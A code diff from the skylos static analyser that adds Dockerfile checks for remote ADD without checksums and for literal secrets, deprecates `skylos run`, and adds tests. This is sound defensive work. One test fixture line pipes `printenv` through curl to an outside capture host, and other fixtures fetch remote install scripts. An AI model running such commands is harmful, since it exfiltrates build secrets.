+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">scan_danger</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_shannon_entropy</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_query</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li></ul>
       </div>
     </div>
       </details>
@@ -1949,12 +1953,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="test unit and regression tests covering cli, analyzer, rules, integrations, and benchmarks. add narrow tests here before trusting analyzer or policy changes. test/ test/__init__.py test/conftest.py test/test_agent_center.py test/test_agent_integration.py test/test_agent_remediate.py test/test_agent_review_benchmark.py test/test_java_security.py test/test_verify_orchestrator.py test/test_debt.py test/test_cli_refactor_guardrails.py test/test_sync.py test/test_cli.py test/test_provenance.py test/test_cli_uncovered_paths.py">
+    <article class="folder-card searchable" data-search="test unit and regression tests covering cli, analyzer, rules, integrations, and benchmarks. add narrow tests here before trusting analyzer or policy changes. test/ test/__init__.py test/conftest.py test/test_agent_center.py test/test_agent_integration.py test/test_agent_remediate.py test/test_agent_review_benchmark.py test/test_java_security.py test/test_verify_orchestrator.py test/test_debt.py test/test_cli_refactor_guardrails.py test/test_sync.py test/test_dangerous.py test/test_cli.py test/test_provenance.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/test" rel="noopener noreferrer">test</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 194</span>
-          <span class="pill"><strong>symbols</strong> 2330</span>
+          <span class="pill"><strong>files</strong> 196</span>
+          <span class="pill"><strong>symbols</strong> 2393</span>
         </div>
       </div>
       <p>Unit and regression tests covering CLI, analyzer, rules, integrations, and benchmarks.</p>
@@ -1973,9 +1977,9 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_debt.py" rel="noopener noreferrer">test/test_debt.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_cli_refactor_guardrails.py" rel="noopener noreferrer">test/test_cli_refactor_guardrails.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_sync.py" rel="noopener noreferrer">test/test_sync.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_dangerous.py" rel="noopener noreferrer">test/test_dangerous.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_cli.py" rel="noopener noreferrer">test/test_cli.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_provenance.py" rel="noopener noreferrer">test/test_provenance.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_cli_uncovered_paths.py" rel="noopener noreferrer">test/test_cli_uncovered_paths.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_provenance.py" rel="noopener noreferrer">test/test_provenance.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
@@ -2009,14 +2013,14 @@
         <tbody>
             <tr class="searchable" data-search="skylos/cli.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">skylos/cli.py</a></td>
-              <td>35 / 183</td>
+              <td>35 / 187</td>
               <td><span class="warn">many symbols</span> <span class="warn">shared path</span></td>
               <td>Root entrypoints and shared scan orchestration.</td>
             </tr>
 
             <tr class="searchable" data-search="skylos/config.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">skylos/config.py</a></td>
-              <td>6 / 26</td>
+              <td>8 / 30</td>
               <td><span class="warn">shared path</span></td>
               <td>Root entrypoints and shared scan orchestration.</td>
             </tr>
@@ -2072,7 +2076,7 @@
 
             <tr class="searchable" data-search="skylos/llm/security_taskflow.py llm security analysis, evidence grounding, provider runtime resolution, and prompt templates.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/security_taskflow.py" rel="noopener noreferrer">skylos/llm/security_taskflow.py</a></td>
-              <td>11 / 58</td>
+              <td>11 / 62</td>
               <td><span class="warn">many symbols</span></td>
               <td>LLM security analysis, evidence grounding, provider runtime resolution, and prompt templates.</td>
             </tr>
@@ -6706,6 +6710,34 @@
               <td>skylos/cli.py</td>
             </tr>
 
+            <tr class="searchable" data-search="_add_agent_security_quick_args def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_add_agent_security_quick_args</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="_add_agent_security_deep_args def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_add_agent_security_deep_args</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="_security_deep_workflow_payload def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_security_deep_workflow_payload</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="_print_security_deep_workflow def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_print_security_deep_workflow</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
             <tr class="searchable" data-search="_explicit_prompt_templates_from_args def skylos/cli.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_explicit_prompt_templates_from_args</a></td>
               <td>def</td>
@@ -7259,8 +7291,22 @@
               <td>skylos/commands/whoami_cmd.py</td>
             </tr>
 
+            <tr class="searchable" data-search="configerror class skylos/config.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">ConfigError</a></td>
+              <td>class</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/config.py</td>
+            </tr>
+
             <tr class="searchable" data-search="load_config def skylos/config.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">load_config</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/config.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="resolve_config_file_path def skylos/config.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">resolve_config_file_path</a></td>
               <td>def</td>
               <td><span class="ok">public</span></td>
               <td>skylos/config.py</td>
@@ -7649,6 +7695,34 @@
               <td>def</td>
               <td><span class="ok">public</span></td>
               <td>skylos/core/result_cache.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="read_text_no_symlink def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">read_text_no_symlink</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="write_existing_text_no_symlink def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">write_existing_text_no_symlink</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="load_project_json_cache def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">load_project_json_cache</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="save_project_json_cache def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">save_project_json_cache</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
             </tr>
 
             <tr class="searchable" data-search="format_suite_table def skylos/core/suite.py small shared core types and helpers used across scan paths.">
@@ -8342,76 +8416,6 @@
               <td>def</td>
               <td><span class="ok">public</span></td>
               <td>skylos/discover/report.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="format_json def skylos/discover/report.py source discovery and language/workspace detection.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/discover/report.py" rel="noopener noreferrer">format_json</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/discover/report.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="taintflow class skylos/discover/taint.py source discovery and language/workspace detection.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/discover/taint.py" rel="noopener noreferrer">TaintFlow</a></td>
-              <td>class</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/discover/taint.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="analyze_taint_flows def skylos/discover/taint.py source discovery and language/workspace detection.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/discover/taint.py" rel="noopener noreferrer">analyze_taint_flows</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/discover/taint.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="build_go_engine_args def skylos/engines/go_contract.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_contract.py" rel="noopener noreferrer">build_go_engine_args</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_contract.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="validate_go_engine_output def skylos/engines/go_contract.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_contract.py" rel="noopener noreferrer">validate_go_engine_output</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_contract.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="goengineerror class skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">GoEngineError</a></td>
-              <td>class</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="discover_go_modules def skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">discover_go_modules</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="resolve_go_engine_bin def skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">resolve_go_engine_bin</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="run_go_engine_for_module def skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">run_go_engine_for_module</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="is_claude_security_report def skylos/integrations/ingest.py external-service integration helpers.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/integrations/ingest.py" rel="noopener noreferrer">is_claude_security_report</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/integrations/ingest.py</td>
             </tr></tbody>
       </table>
     </section>

--- a/skylos/commands/run_cmd.py
+++ b/skylos/commands/run_cmd.py
@@ -11,6 +11,13 @@ from skylos.config import load_config
 from skylos.constants import parse_exclude_folders
 
 
+DEPRECATION_WARNING = (
+    "[bold yellow]Warning:[/bold yellow] `skylos run` is deprecated and will be "
+    "removed in the next major release. Use [bold]skylos . -a[/bold] or "
+    "[bold]skylos suite .[/bold] for local analysis."
+)
+
+
 def _load_start_server() -> Callable[..., Any]:
     from skylos.web.server import start_server
 
@@ -25,6 +32,7 @@ def run_run_command(
     parse_exclude_folders_func: Callable[..., set[str] | tuple[str, ...]] = parse_exclude_folders,
     start_server_loader: Callable[[], Callable[..., Any]] = _load_start_server,
 ) -> None:
+    console = console_factory()
     run_exclude_folders: list[str] = []
     run_include_folders: list[str] = []
     run_port = None
@@ -45,11 +53,11 @@ def run_run_command(
             try:
                 run_port = int(argv[i + 1])
             except ValueError:
-                console_factory().print("[bold red]Error: --port must be an integer[/bold red]")
+                console.print("[bold red]Error: --port must be an integer[/bold red]")
                 raise SystemExit(1)
             i += 2
         elif argv[i] == "--port":
-            console_factory().print("[bold red]Error: --port requires a value[/bold red]")
+            console.print("[bold red]Error: --port requires a value[/bold red]")
             raise SystemExit(1)
         else:
             i += 1
@@ -59,11 +67,13 @@ def run_run_command(
         if run_port is not None:
             os.environ["SKYLOS_PORT"] = str(run_port)
 
+        console.print(DEPRECATION_WARNING)
+
         try:
             start_server = start_server_loader()
         except ImportError:
-            console_factory().print("[bold red]Error: Flask is required[/bold red]")
-            console_factory().print(
+            console.print("[bold red]Error: Flask is required[/bold red]")
+            console.print(
                 "[bold yellow]Install with: pip install flask flask-cors[/bold yellow]"
             )
             raise SystemExit(1)
@@ -77,13 +87,13 @@ def run_run_command(
 
         start_server(exclude_folders=list(exclude_folders))
     except ImportError:
-        console_factory().print("[bold red]Error: Flask is required[/bold red]")
-        console_factory().print(
+        console.print("[bold red]Error: Flask is required[/bold red]")
+        console.print(
             "[bold yellow]Install with: pip install flask flask-cors[/bold yellow]"
         )
         raise SystemExit(1)
     except ValueError as exc:
-        console_factory().print(f"[bold red]Error: {exc}[/bold red]")
+        console.print(f"[bold red]Error: {exc}[/bold red]")
         raise SystemExit(1)
     finally:
         if run_port is not None:

--- a/skylos/rules/catalog.py
+++ b/skylos/rules/catalog.py
@@ -204,6 +204,8 @@ _RULES = (
     RuleCatalogEntry("SKY-D339", "Persistent environment mutation", "security", "HIGH"),
     RuleCatalogEntry("SKY-D340", "Unapproved package or artifact publish", "security", "HIGH"),
     RuleCatalogEntry("SKY-D341", "Untrusted package-managed tool execution", "security", "HIGH"),
+    RuleCatalogEntry("SKY-D342", "Dockerfile remote ADD without checksum", "security", "HIGH"),
+    RuleCatalogEntry("SKY-D343", "Dockerfile literal secret build value", "security", "HIGH"),
     RuleCatalogEntry("SKY-G203", "Go defer in loop", "security", "HIGH"),
     RuleCatalogEntry("SKY-G206", "Go unsafe package import", "security", "HIGH"),
     RuleCatalogEntry("SKY-G207", "Go weak MD5 hash", "security", "MEDIUM"),

--- a/skylos/rules/config/container/dockerfile.py
+++ b/skylos/rules/config/container/dockerfile.py
@@ -27,13 +27,23 @@ SKIP_DIR_NAMES = {
     "venv",
 }
 MAX_DOCKERFILE_BYTES = 1_000_000
-RUN_RE = re.compile(r"^\s*RUN(?:\s|$)", re.I)
+INSTRUCTION_RE = re.compile(r"^\s*(?P<instruction>[A-Z]+)(?:\s|$)", re.I)
 RUN_OPTION_RE = re.compile(
     r"^--(?:mount|network|security)"
     r"(?:=(?:\"[^\"]*\"|'[^']*'|[^\s]+)|\s+(?:\"[^\"]*\"|'[^']*'|[^\s]+))"
     r"\s*"
 )
 SHELL_INTERPRETERS = {"bash", "dash", "ksh", "sh", "zsh"}
+ADD_VALUE_FLAGS = {"--checksum", "--chown", "--chmod", "--exclude", "--keep-git-dir"}
+SECRET_REFERENCE_SUFFIXES = ("_FILE", "_PATH", "_DIR", "_NAME", "_ARN")
+REMOTE_URL_RE = re.compile(r"^https?://", re.I)
+SECRET_NAME_RE = re.compile(
+    r"(?:^|_)(?:"
+    r"API_KEY|ACCESS_KEY|CLIENT_SECRET|CREDENTIALS?|PASSWORD|PASSWD|"
+    r"PRIVATE_KEY|SECRET|TOKEN"
+    r")(?:_|$)",
+    re.I,
+)
 
 
 def _finding(
@@ -111,22 +121,24 @@ def _discover_dockerfiles(root: Path, changed_files: set[str] | None) -> list[Pa
     return sorted(candidates)
 
 
-def _iter_run_instructions(lines: list[str]) -> Iterator[tuple[int, str]]:
+def _iter_instructions(lines: list[str]) -> Iterator[tuple[int, str, str]]:
     idx = 0
     while idx < len(lines):
         line = lines[idx]
-        if not RUN_RE.match(line):
+        match = INSTRUCTION_RE.match(line)
+        if not match:
             idx += 1
             continue
 
+        instruction = match.group("instruction").upper()
         start_line = idx + 1
-        body = RUN_RE.sub("", line, count=1).strip()
+        body = line[match.end() :].strip()
         while _line_continues(lines[idx]) and idx + 1 < len(lines):
             body = body.rstrip().removesuffix("\\").rstrip()
             idx += 1
             body = f"{body} {lines[idx].strip()}".strip()
 
-        yield start_line, body
+        yield start_line, instruction, body
         idx += 1
 
 
@@ -146,6 +158,172 @@ def _commands_from_run_body(body: str) -> Iterator[str]:
         return
 
     yield stripped
+
+
+def _add_sources_from_body(body: str) -> tuple[list[str], bool]:
+    tokens = _instruction_tokens(body)
+    if not tokens:
+        return [], False
+
+    sources: list[str] = []
+    has_checksum = False
+    idx = 0
+    while idx < len(tokens):
+        token = tokens[idx]
+        if token == "--checksum":
+            has_checksum = True
+            idx += 2
+            continue
+        if token.startswith("--checksum="):
+            has_checksum = True
+            idx += 1
+            continue
+        if token.startswith("--"):
+            flag_name = token.split("=", 1)[0]
+            if "=" in token or flag_name not in ADD_VALUE_FLAGS:
+                idx += 1
+            else:
+                idx += 2
+            continue
+        sources.append(token)
+        idx += 1
+
+    if len(sources) <= 1:
+        return [], has_checksum
+    return sources[:-1], has_checksum
+
+
+def _instruction_tokens(body: str) -> list[str]:
+    stripped = body.strip()
+    if not stripped:
+        return []
+    if stripped.startswith("["):
+        try:
+            raw = json.loads(stripped)
+        except json.JSONDecodeError:
+            return []
+        if isinstance(raw, list) and all(isinstance(item, str) for item in raw):
+            return raw
+        return []
+    return _shell_tokens(stripped)
+
+
+def _secret_assignments_from_body(instruction: str, body: str) -> list[tuple[str, str]]:
+    tokens = _instruction_tokens(body)
+    if not tokens:
+        return []
+
+    assignments: list[tuple[str, str]] = []
+    if instruction == "ARG":
+        for token in tokens:
+            if "=" not in token:
+                continue
+            name, value = token.split("=", 1)
+            assignments.append((name, value))
+        return assignments
+
+    if instruction != "ENV":
+        return []
+
+    equals_tokens = [
+        token for token in tokens if "=" in token and not token.startswith("=")
+    ]
+    if equals_tokens:
+        for token in equals_tokens:
+            name, value = token.split("=", 1)
+            assignments.append((name, value))
+        return assignments
+
+    if len(tokens) >= 2:
+        assignments.append((tokens[0], " ".join(tokens[1:])))
+    return assignments
+
+
+def _secret_value_is_literal(value: str) -> bool:
+    raw = value.strip()
+    if not raw:
+        return False
+    if raw.startswith("$"):
+        return False
+    return True
+
+
+def _secret_name_is_sensitive(name: str) -> bool:
+    normalized = name.strip()
+    if not normalized:
+        return False
+    if normalized.upper().endswith(SECRET_REFERENCE_SUFFIXES):
+        return False
+    return SECRET_NAME_RE.search(normalized) is not None
+
+
+def _scan_remote_add(
+    findings: list[dict[str, Any]],
+    *,
+    file_path: Path,
+    lines: list[str],
+    line: int,
+    body: str,
+    ignore: set[str],
+) -> None:
+    rule_id = "SKY-D342"
+    if rule_id in ignore or _is_inline_ignored(lines, line, rule_id):
+        return
+    sources, has_checksum = _add_sources_from_body(body)
+    if has_checksum:
+        return
+    if not any(REMOTE_URL_RE.match(source) for source in sources):
+        return
+    findings.append(
+        _finding(
+            rule_id=rule_id,
+            name="dockerfile-remote-add-without-checksum",
+            message=(
+                "Dockerfile ADD fetches a remote URL without a checksum. "
+                "Download with a pinned digest/checksum or vendor the artifact."
+            ),
+            file=file_path,
+            line=line,
+            severity="HIGH",
+            value="ADD remote URL",
+        )
+    )
+
+
+def _scan_secret_build_values(
+    findings: list[dict[str, Any]],
+    *,
+    file_path: Path,
+    lines: list[str],
+    line: int,
+    instruction: str,
+    body: str,
+    ignore: set[str],
+) -> None:
+    rule_id = "SKY-D343"
+    if rule_id in ignore or _is_inline_ignored(lines, line, rule_id):
+        return
+    for name, value in _secret_assignments_from_body(instruction, body):
+        if not _secret_name_is_sensitive(name):
+            continue
+        if not _secret_value_is_literal(value):
+            continue
+        findings.append(
+            _finding(
+                rule_id=rule_id,
+                name="dockerfile-literal-secret-build-value",
+                message=(
+                    f"Dockerfile {instruction} sets secret-looking `{name}` to a "
+                    "literal value. Use build secrets or runtime secret injection "
+                    "instead of baking credentials into image layers."
+                ),
+                file=file_path,
+                line=line,
+                severity="HIGH",
+                value=f"{instruction} {name}",
+            )
+        )
+        return
 
 
 def _strip_run_options(body: str) -> str:
@@ -206,22 +384,44 @@ def scan_dockerfile_file(
     ignored = ignore or set()
     lines = text.splitlines()
     findings: list[dict[str, Any]] = []
-    for line, body in _iter_run_instructions(lines):
-        for command in _commands_from_run_body(body):
-            for risk in scan_shell_command(command):
-                if risk.rule_id in ignored or _is_inline_ignored(lines, line, risk.rule_id):
-                    continue
-                findings.append(
-                    _finding(
-                        rule_id=risk.rule_id,
-                        name="dockerfile-run-command-risk",
-                        message=risk.message,
-                        file=file_path,
-                        line=line,
-                        severity=risk.severity,
-                        value=risk.rule_id,
+    for line, instruction, body in _iter_instructions(lines):
+        if instruction == "RUN":
+            for command in _commands_from_run_body(body):
+                for risk in scan_shell_command(command):
+                    if risk.rule_id in ignored or _is_inline_ignored(
+                        lines, line, risk.rule_id
+                    ):
+                        continue
+                    findings.append(
+                        _finding(
+                            rule_id=risk.rule_id,
+                            name="dockerfile-run-command-risk",
+                            message=risk.message,
+                            file=file_path,
+                            line=line,
+                            severity=risk.severity,
+                            value=risk.rule_id,
+                        )
                     )
-                )
+        elif instruction == "ADD":
+            _scan_remote_add(
+                findings,
+                file_path=file_path,
+                lines=lines,
+                line=line,
+                body=body,
+                ignore=ignored,
+            )
+        elif instruction in {"ARG", "ENV"}:
+            _scan_secret_build_values(
+                findings,
+                file_path=file_path,
+                lines=lines,
+                line=line,
+                instruction=instruction,
+                body=body,
+                ignore=ignored,
+            )
     return findings
 
 

--- a/skylos/ui/help.py
+++ b/skylos/ui/help.py
@@ -151,7 +151,7 @@ COMMANDS = [
     },
     {
         "name": "skylos run",
-        "desc": "Start local web dashboard server (--port and SKYLOS_PORT supported)",
+        "desc": "Deprecated local web dashboard; use skylos . -a or skylos suite .",
         "group": "Utility",
     },
     {"name": "skylos commands", "desc": "List all commands (flat)", "group": "Utility"},

--- a/skylos/visitors/base.py
+++ b/skylos/visitors/base.py
@@ -64,6 +64,7 @@ PYTHON_BUILTINS = {
 }
 
 DYNAMIC_PATTERNS = {"getattr", "globals", "eval", "exec"}
+IMPORT_FALLBACK_EXCEPTIONS = {"ImportError", "ModuleNotFoundError"}
 
 OVERRIDE_DECORATORS = {
     "override",
@@ -177,6 +178,21 @@ IMPLICIT_DUNDERS = {
 }
 
 METACLASS_BASES = {"ABCMeta", "EnumMeta", "type"}
+
+
+def _exception_type_leaf_names(exc_type: ast.expr | None) -> set[str]:
+    if exc_type is None:
+        return set()
+    if isinstance(exc_type, ast.Name):
+        return {exc_type.id}
+    if isinstance(exc_type, ast.Attribute):
+        return {exc_type.attr}
+    if isinstance(exc_type, (ast.Tuple, ast.List)):
+        names: set[str] = set()
+        for elt in exc_type.elts:
+            names.update(_exception_type_leaf_names(elt))
+        return names
+    return set()
 
 
 class Definition:
@@ -601,8 +617,7 @@ class Visitor(ast.NodeVisitor):
         self._complexity_stack[-1] += len(node.handlers)
 
         is_import_error_handler = any(
-            isinstance(h.type, ast.Name)
-            and h.type.id in ("ImportError", "ModuleNotFoundError")
+            _exception_type_leaf_names(h.type) & IMPORT_FALLBACK_EXCEPTIONS
             for h in node.handlers
         )
 
@@ -639,6 +654,9 @@ class Visitor(ast.NodeVisitor):
                             self.add_ref(full_name)
 
         self.generic_visit(node)
+
+    if hasattr(ast, "TryStar"):
+        visit_TryStar = visit_Try
 
     def visit_With(self, node: ast.With) -> None:
         for item in node.items:

--- a/test/test_cli_run.py
+++ b/test/test_cli_run.py
@@ -4,6 +4,7 @@ import types
 from unittest.mock import patch
 
 import pytest
+from rich.console import Console
 
 
 class TestRunCommand:
@@ -52,3 +53,27 @@ class TestRunCommand:
                 main()
 
         assert exc_info.value.code == 1
+
+    def test_run_command_warns_that_web_dashboard_is_deprecated(self):
+        from skylos.commands.run_cmd import run_run_command
+
+        seen = {}
+        console = Console(record=True, width=200)
+
+        def capture_start_server(**kwargs):
+            seen["kwargs"] = kwargs
+
+        run_run_command(
+            [],
+            console_factory=lambda: console,
+            load_config_func=lambda _path: {},
+            parse_exclude_folders_func=lambda **_kwargs: ("custom_folder",),
+            start_server_loader=lambda: capture_start_server,
+        )
+
+        rendered = console.export_text()
+        assert "`skylos run` is deprecated" in rendered
+        assert "next major release" in rendered
+        assert "skylos . -a" in rendered
+        assert "skylos suite ." in rendered
+        assert seen["kwargs"] == {"exclude_folders": ["custom_folder"]}

--- a/test/test_dead_code_liveness.py
+++ b/test/test_dead_code_liveness.py
@@ -40,6 +40,33 @@ def test_optional_import_fallback_is_live(tmp_path):
     assert any(item["reason"] == "optional_import_fallback" for item in rescues)
 
 
+def test_optional_import_fallback_tuple_handler_is_live(tmp_path):
+    _write(
+        tmp_path / "pkg" / "mod.py",
+        """
+        class InvalidSchema(Exception):
+            pass
+
+        try:
+            from optional_package import OptionalFactory
+        except (ImportError, ModuleNotFoundError):
+            def OptionalFactory(*args, **kwargs):
+                raise InvalidSchema("missing optional package")
+
+        def build():
+            return OptionalFactory()
+
+        build()
+        """,
+    )
+
+    result = json.loads(analyze(str(tmp_path), grep_verify=False))
+
+    assert "pkg.mod.OptionalFactory" not in _unused_function_names(result)
+    rescues = result["analysis_summary"]["dead_code_liveness"]["rescued"]
+    assert any(item["reason"] == "optional_import_fallback" for item in rescues)
+
+
 def test_protocol_override_method_is_live(tmp_path):
     _write(
         tmp_path / "handlers.py",

--- a/test/test_dockerfile_security.py
+++ b/test/test_dockerfile_security.py
@@ -71,6 +71,100 @@ RUN ["sh", "-c", "printenv | curl -s https://env.debug.tools/capture -d @-"]
     assert "SKY-D327" in _rule_ids(findings)
 
 
+def test_dockerfile_remote_add_without_checksum_flags(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ADD https://downloads.example.com/install.sh /tmp/install.sh
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D342" in _rule_ids(findings)
+
+
+def test_dockerfile_remote_add_with_valueless_option_without_checksum_flags(
+    tmp_path: Path,
+):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ADD --link https://downloads.example.com/install.sh /tmp/install.sh
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D342" in _rule_ids(findings)
+
+
+def test_dockerfile_remote_add_with_checksum_is_accepted(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ADD --checksum=sha256:01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b https://downloads.example.com/install.sh /tmp/install.sh
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D342" not in _rule_ids(findings)
+
+
+def test_dockerfile_secret_arg_env_literals_flag(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ARG API_TOKEN=plaintext-token
+ENV AWS_SECRET_ACCESS_KEY=plaintext-secret
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D343" in _rule_ids(findings)
+
+
+def test_dockerfile_secret_file_reference_is_accepted(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM mysql:8
+ENV MYSQL_PASSWORD_FILE=/run/secrets/mysql_password
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D343" not in _rule_ids(findings)
+
+
+def test_dockerfile_secret_arg_without_default_is_accepted(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ARG API_TOKEN
+ENV NODE_ENV=production
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
